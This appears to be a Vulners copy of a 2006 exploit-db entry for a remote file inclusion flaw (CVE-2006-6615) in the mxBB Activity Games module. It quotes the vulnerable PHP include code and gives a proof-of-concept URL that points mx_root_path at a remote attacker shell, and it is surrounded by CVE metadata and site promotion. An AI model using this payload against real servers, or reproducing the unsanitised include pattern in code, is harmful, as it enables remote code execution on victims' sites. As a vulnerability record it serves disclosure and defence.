Lucene search
+L

mxBB Module Activity Games 0.92 - Remote File Inclusion

🗓️ 11 Dec 2006 00:00:00Reported by 3l3ctric-CrackerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

mxBB Module Games 0.92 Remote File Inclusion Exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-6615
18 Dec 200602:00
cve
cvelist
Cvelist
CVE-2006-6615
18 Dec 200602:00
cvelist
euvd
EUVD
EUVD-2006-6598
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-6615
18 Dec 200602:28
nvd
# mx_act (mxBB Games Module)   --Remote File Inclusion Exploit
# Bug Found & Exploit [c]oded By Dr Max Virus
# Download:http://www.mx-system.com/index.php?page=4&action=file&file_id=71

Problem area:

	if ( !file_exists($mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx ) )
	{
	  	include( $mx_root_path . 'modules/mx_act/language/lang_english/lang_activity.'.$phpEx );
		$link_language='lang_english';
	}
	else
	{
	  	include(  $mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx );
		$link_language='lang_' . $board_config['default_lang'];
	}

PoC:

	http://site.com/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=http://[yourshell]?&


# exploit was broken and removed. /str0ke

# milw0rm.com [2006-12-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Dec 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02498
50